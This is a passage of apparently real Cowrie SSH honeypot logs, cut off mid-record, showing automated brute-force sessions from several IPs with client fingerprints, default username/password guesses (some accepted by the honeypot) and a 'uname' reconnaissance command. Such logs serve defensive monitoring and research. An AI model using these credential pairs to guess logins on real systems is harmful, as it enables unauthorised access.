{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":56672,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b3f67bc3712","protocol":"ssh","message":"New connection: 41.226.27.251:56672 (1.2.3.4:22) [session: 0b3f67bc3712]","sensor":"my-vps","timestamp":"2025-08-31T03:06:25.943010Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:06:25.945801Z","src_ip":"41.226.27.251","session":"0b3f67bc3712"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:06:25.986407Z","src_ip":"41.226.27.251","session":"0b3f67bc3712"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-31T03:06:26.241781Z","src_ip":"41.226.27.251","session":"0b3f67bc3712"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:06:27.435806Z","src_ip":"41.226.27.251","session":"0b3f67bc3712"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:06:27.656256Z","src_ip":"212.227.235.229","session":"4d6aae38da16"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:06:36.834851Z","src_ip":"212.227.235.229","session":"5a88bd365c24"}
{"eventid":"cowrie.session.closed","duration":"24.5","message":"Connection lost after 24.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:06:39.543241Z","src_ip":"212.227.235.229","session":"0e748c69457a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50364,"dst_ip":"1.2.3.4","dst_port":22,"session":"21c5540e20ce","protocol":"ssh","message":"New connection: 212.227.125.160:50364 (1.2.3.4:22) [session: 21c5540e20ce]","sensor":"my-vps","timestamp":"2025-08-31T03:06:40.474798Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:06:40.996053Z","src_ip":"212.227.125.160","session":"21c5540e20ce"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:06:40.996768Z","src_ip":"212.227.125.160","session":"21c5540e20ce"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"letmein","message":"login attempt [ftpuser/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T03:06:43.244434Z","src_ip":"212.227.125.160","session":"21c5540e20ce"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:06:44.765205Z","src_ip":"212.227.125.160","session":"21c5540e20ce"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":45274,"dst_ip":"1.2.3.4","dst_port":22,"session":"6ecc75bf298c","protocol":"ssh","message":"New connection: 41.226.27.251:45274 (1.2.3.4:22) [session: 6ecc75bf298c]","sensor":"my-vps","timestamp":"2025-08-31T03:06:45.888836Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:06:45.889891Z","src_ip":"41.226.27.251","session":"6ecc75bf298c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:06:45.934817Z","src_ip":"41.226.27.251","session":"6ecc75bf298c"}
{"eventid":"cowrie.login.failed","username":"nvidia","password":"nvidia123","message":"login attempt [nvidia/nvidia123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:06:46.070760Z","src_ip":"41.226.27.251","session":"6ecc75bf298c"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:06:47.249886Z","src_ip":"41.226.27.251","session":"6ecc75bf298c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:06:54.624308Z","src_ip":"212.227.235.229","session":"5a88bd365c24"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:06:54.625026Z","src_ip":"212.227.235.229","session":"5a88bd365c24"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"6.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 6.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:07:00.783971Z","src_ip":"212.227.235.229","session":"5a88bd365c24"}
{"eventid":"cowrie.session.closed","duration":"103.5","message":"Connection lost after 103.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:07:00.785133Z","src_ip":"212.227.235.229","session":"5a88bd365c24"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":42860,"dst_ip":"1.2.3.4","dst_port":22,"session":"df56b80129b9","protocol":"ssh","message":"New connection: 41.226.27.251:42860 (1.2.3.4:22) [session: df56b80129b9]","sensor":"my-vps","timestamp":"2025-08-31T03:07:05.892350Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:07:05.980195Z","src_ip":"41.226.27.251","session":"df56b80129b9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:07:05.981449Z","src_ip":"41.226.27.251","session":"df56b80129b9"}
{"eventid":"cowrie.login.success","username":"root","password":"AA123456","message":"login attempt [root/AA123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:07:06.160098Z","src_ip":"41.226.27.251","session":"df56b80129b9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:07:06.263546Z","src_ip":"41.226.27.251","session":"df56b80129b9"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:07:06.264499Z","src_ip":"41.226.27.251","session":"df56b80129b9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:07:06.314759Z","src_ip":"41.226.27.251","session":"df56b80129b9"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:07:06.315870Z","src_ip":"41.226.27.251","session":"df56b80129b9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40192,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8a37f588d5a","protocol":"ssh","message":"New connection: 212.227.235.229:40192 (1.2.3.4:22) [session: e8a37f588d5a]","sensor":"my-vps","timestamp":"2025-08-31T03:07:17.165191Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:07:19.298815Z","src_ip":"212.227.235.229","session":"e8a37f588d5a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:07:19.299917Z","src_ip":"212.227.235.229","session":"e8a37f588d5a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33696,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d1a9fedf83c","protocol":"ssh","message":"New connection: 212.227.125.160:33696 (1.2.3.4:22) [session: 4d1a9fedf83c]","sensor":"my-vps","timestamp":"2025-08-31T03:07:20.137262Z"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"welcome","message":"login attempt [ftpuser/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T03:07:24.190508Z","src_ip":"212.227.235.229","session":"e8a37f588d5a"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:07:24.714366Z","src_ip":"212.227.125.160","session":"4d1a9fedf83c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:07:24.715919Z","src_ip":"212.227.125.160","session":"4d1a9fedf83c"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":35308,"dst_ip":"1.2.3.4","dst_port":22,"session":"0495fc55775d","protocol":"ssh","message":"New connection: 41.226.27.251:35308 (1.2.3.4:22) [session: 0495fc55775d]","sensor":"my-vps","timestamp":"2025-08-31T03:07:26.343259Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:07:26.344174Z","src_ip":"41.226.27.251","session":"0495fc55775d"}
{"eventid":"cowrie.session.closed","duration":"9.2","message":"Connection lost after 9.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:07:26.345224Z","src_ip":"212.227.235.229","session":"e8a37f588d5a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:07:26.396100Z","src_ip":"41.226.27.251","session":"0495fc55775d"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ@WSX","message":"login attempt [root/!QAZ@WSX] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:07:26.552670Z","src_ip":"41.226.27.251","session":"0495fc55775d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:07:27.111487Z","src_ip":"41.226.27.251","session":"0495fc55775d"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:07:27.112183Z","src_ip":"41.226.27.251","session":"0495fc55775d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:07:27.164791Z","src_ip":"41.226.27.251","session":"0495fc55775d"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:07:27.165870Z","src_ip":"41.226.27.251","session":"0495fc55775d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58738,"dst_ip":"1.2.3.4","dst_port":22,"session":"331edc9e54ce","protocol":"ssh","message":"New connection: 212.227.125.160:58738 (1.2.3.4:22) [session: 331edc9e54ce]","sensor":"my-vps","timestamp":"2025-08-31T03:07:32.742324Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:07:32.743618Z","src_ip":"212.227.125.160","session":"331edc9e54ce"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:07:32.989747Z","src_ip":"212.227.125.160","session":"331edc9e54ce"}
{"eventid":"cowrie.login.failed","username":"redis","password":"Huawei12#$","message":"login attempt [redis/Huawei12#$] failed","sensor":"my-vps","timestamp":"2025-08-31T03:07:34.059412Z","src_ip":"212.227.125.160","session":"331edc9e54ce"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:07:35.310513Z","src_ip":"212.227.125.160","session":"331edc9e54ce"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"123456","message":"login attempt [esuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:07:37.708735Z","src_ip":"212.227.125.160","session":"4d1a9fedf83c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58886,"dst_ip":"1.2.3.4","dst_port":22,"session":"10d8debf8ae2","protocol":"ssh","message":"New connection: 212.227.125.160:58886 (1.2.3.4:22) [session: 10d8debf8ae2]","sensor":"my-vps","timestamp":"2025-08-31T03:07:38.657097Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:07:39.090360Z","src_ip":"212.227.125.160","session":"10d8debf8ae2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 